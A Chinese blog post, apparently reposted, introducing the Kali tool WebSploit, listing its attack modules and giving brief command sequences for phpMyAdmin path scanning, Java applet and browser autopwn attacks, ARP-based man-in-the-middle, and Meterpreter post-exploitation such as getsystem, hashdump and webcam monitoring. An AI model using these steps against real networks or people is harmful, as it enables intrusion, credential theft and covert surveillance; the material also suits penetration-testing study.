程序员经验分享-hwhale

kali自动化渗透神器websploit模块介绍

2023-10-31

websploit

安装websploit

root@kali2:~# apt-get install websploit


root@kali2:~# websploit


db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
 `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    


		--=[WebSploit Advanced MITM Framework
	+---**---==[Version :3.0.0
	+---**---==[Codename :Katana
	+---**---==[Available Modules : 20
		--=[Update Date : [r3.0.0-000 20.9.2014]


wsf > help
Commands		Description
---------------		----------------
set 			Set Value Of Options To Modules
scan			Scan Wifi (Wireless Modules)
stop			Stop Attack & Scan (Wireless Modules)
run 			Execute Module
use 			Select Module For Use
os 			Run Linux Commands(ex : os ifconfig)
back			Exit Current Module
show modules		Show Modules of Current Database
show options		Show Current Options Of Selected Module
upgrade			Get New Version
update			Update Websploit Framework 
about			About US

os clear  //清空屏幕
wsf > show modules
Web Modules			Description
-------------------		---------------------
web/apache_users		Scan Directory Of Apache Users
web/dir_scanner			Directory Scanner
web/wmap			Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma				PHPMyAdmin Login Page Scanner
web/cloudflare_resolver		CloudFlare Resolver




Network Modules			Description
-------------------		---------------------
network/arp_dos			ARP Cache Denial Of Service Attack
network/mfod			Middle Finger Of Doom Attack
network/mitm			Man In The Middle Attack
network/mlitm			Man Left In The Middle Attack
network/webkiller		TCP Kill Attack
network/fakeupdate		Fake Update Attack Using DNS Spoof
network/arp_poisoner		Arp Poisoner




Exploit Modules			Description
-------------------		---------------------
exploit/autopwn			Metasploit Autopwn Service
exploit/browser_autopwn		Metasploit Browser Autopwn Service
exploit/java_applet		Java Applet Attack (Using HTML)




Wireless / Bluetooth Modules	Description
-------------------		---------------------
wifi/wifi_jammer		Wifi Jammer
wifi/wifi_dos			Wifi Dos Attack
wifi/wifi_honeypot		Wireless Honeypot(Fake AP)
wifi/mass_deauth		Mass Deauthentication Attack
bluetooth/bluetooth_pod		Bluetooth Ping Of Death Attack


- ------------------------------------------------------------------------------------
web/pma 模块  //测试网址路径
use web/pma
show opions
set target 测试网址
run
***********
开始启动对应配置和模块
检测phpmyadmin的路径
***********
- ------------------------------------------------------------------------------------
exploit/java applet 模块  //java小程序攻击,感觉和beef有点像
show options
set lhost 自己的ip
set interface wlan0
run


目标打开网址后,则可以监听
show sessions   查看链接的ip
sessions -i 1    选择第一个session
进入meterpreter的交互界面
相当于进入服务器了,可以任意提权
执行shell命令 
- ---------------------------------------------------------------------------------------
use network/mitm   //中间人攻击模块,特点:自动化   欺骗 嗅探
set router  你的网关
set target  目标ip地址
run
- ------------------------------------------------------------------------------------
exploit/browser_autopwn   模块
set ubterface wlan0
set interface wlan0

set lhost 本地ip



getsystem                                      #获取sytem权限
hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解
run vnc                                           #远程连接,监控屏幕
run webcam -p /var/www/          #监控摄像头
background                                   #不退出此meterpreter并返回msf



本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

工具使用

websploit

kali自动化渗透神器websploit模块介绍 的相关文章

随机推荐

  • 这本Python入门畅销书《“笨办法”学python 3》,不仅仅是一本书

    此前 小编分享过一篇文章 跟着数百万人编程导师学C语言 介绍的是泽德 A 肖大神的新书 笨办法 学C语言 很多用户在后台留言 笨办法 学Python 3 什么时候出版 今天这本书终于在六月初与大家见面啦 与作者其他的图书风格一样 笨办法 学

  • centos7.9单机版安装oracle19c与rockylinux安装单机版21c

    oracle19C安装 Database Software Downloads Oraclehttps www oracle com database technologies oracle database software downlo

  • JAVA面试知识整理

    1 我们是根据什么创建一个表 数据库范式 2 数据库范式 第一范式 数据表的原子性 创建表的字段的时候 每个字段列不可再分出更多的字段 第二范式 在第一范式基础上 表需要一个唯一的字段为主键 通过主键可以快速的找到每一条数据 第三范式 在第

  • jupyter中使用matplotlib

    小试牛刀 matplotlib可能是Python 2D绘图领域使用最广泛的库了 它能够让使用者轻松地将数据图形化 并且提供多样化的输出格式 同时 它几乎能够对图进行所有你能够想到的细节的修饰 我们先来看看一个小例子 In 1 matplot

  • 【01】-迟来的毕设进度记录-【场景搭建、photon实时实现联机(二)】

    嗨我又回来了 今天的任务是 场景KO掉啦 大概基础就这样 植被细节接着弄 重大突破 在动画方面进行了修改 如下图 思路是 玩家按下鼠标左键直接攻击播放攻击动画 不需要bool繁琐的判断 代码也简化 而且之前有BUG 就是玩家按着鼠标左键时

  • SQL ORDER BY 关键字

    ORDER BY 关键字用于对结果集进行排序 SQL ORDER BY 关键字 ORDER BY 关键字用于对结果集按照一个列或者多个列进行排序 ORDER BY 关键字默认按照升序对记录进行排序 如果需要按照降序对记录进行排序 您可以使用

  • 《Ordinal Depth Supervision for 3D Human Pose Estimation》-CVPR2018 论文阅读

    简介 Ordinal Depth Supervision for 3D Human Pose Estimation 是一篇CVPR2018 Oral Presentation的工作 主要解决RGB的3D human pose estimat

  • 虚拟机中安装win7报错【解决方案】

    问题 You have configured this virtual machine to use a 64 bit guest operating system However 64 bit operation is not possi

  • 图像数据集整理汇总(包含ImageNet、旷视、VOC、COCO等等)

    链接 https pan baidu com s 1t8mQQzXJvxSA8GcCXbNIhA 提取码 pys8 ImageNet https image net org download php 旷视CrowdHuamn数据集 http

  • Kafka3.0.0版本——增加副本因子

    目录 一 服务器信息 二 启动zookeeper和kafka集群 2 1 先启动zookeeper集群 2 2 再启动kafka集群 三 增加副本因子 3 1 增加副本因子的概述 3 2 增加副本因子的示例 3 2 1 创建topic 主题

  • 计算机网络 谢希仁 课后习题部分答案

    试说明IP地址与硬件地址的区别 为什么要使用这两种不同的地址 解 IP地址放在IP数据报的首部 硬件地址则放MAC帧的首部 在网络层和网络层以上使用IP地址 数据链路层及以下使用硬件地址 IP 地址就是给每个连接在因特网上的主机 或路由器

  • aspose操作文档

    操作aspose版本 aspose words 21 4 官网下载地址 https releases aspose com words java 问题 1 每次操作文档的时候都要重新保存 不然文件损坏 打开的文件就是乱码的 记录一些简单的功

  • RobotFramework环境配置七:多浏览器兼容性测试(1)

    多浏览器兼容性测试 1 RIDE已经支持多浏览器兼容性测试 例如 firefox ie chrome safari 但是 项目要求支持360极速和360安全浏览器 所以 我们需要增加代码让RIDE识别 其他浏览器类似 本地浏览器 说明 基于

  • 电源完整性的很好的解释

    电源和地层大块平面间构成了谐振腔 高速数字信号经过时 犹如快艇在湖面掀起一阵波浪 电源地之间电压起了波动 既然是谐振 机械上叫共振 就要固有频率 这个固有频率是与电源和地平面的形状 中间的介质参数 介电常数 损耗 厚度 有关系的 一旦这些参

  • 1、Django使用Bootstrap

    1 Django使用Bootstrap 学习一段时间Django后 想写一个博客 CSS框架使用Bootstrap 但是将bootstrap css源文件拷贝到到app static css下后 发现无任何效果 百思不得其解 郁闷了一天后

  • 数据结构知识整理

    标题2020 1024 996 你品 你细品 堆 栈 队列 大根堆小根堆 大根堆 堆顶的元素是最大的 越往下越小 小根堆 堆顶的元素是最小的 越往下越大 大根堆小根堆的声明 priority queue

  • 通过超链接 解析zip压缩包 中的 xml 内容

    import com alibaba fastjson JSON import com api zp documentexchange OkHttp import okhttp3 OkHttpClient import okhttp3 Re

  • Eigen与cuda兼容问题解决

    1 报错 usr include eigen3 Eigen src Core arch CUDA Half h 596 error no suitable constructor exists to convert from float t

  • 源码解析(一):Spring JDBC如何实现多数据源

    Spring JDBC如何实现多数据源 背景 类介绍 bean初始化设置属性 1 AbstractRoutingDataSource 属性 2 初始化设置 设置当前lookupKey 1 获取 lookupKey 2 找到目标数据源 获取连

  • kali自动化渗透神器websploit模块介绍

    websploit 安装websploit root kali2 apt get install websploit root kali2 websploit db d8b db d88888b d8888b d8888 d8888b db

热门标签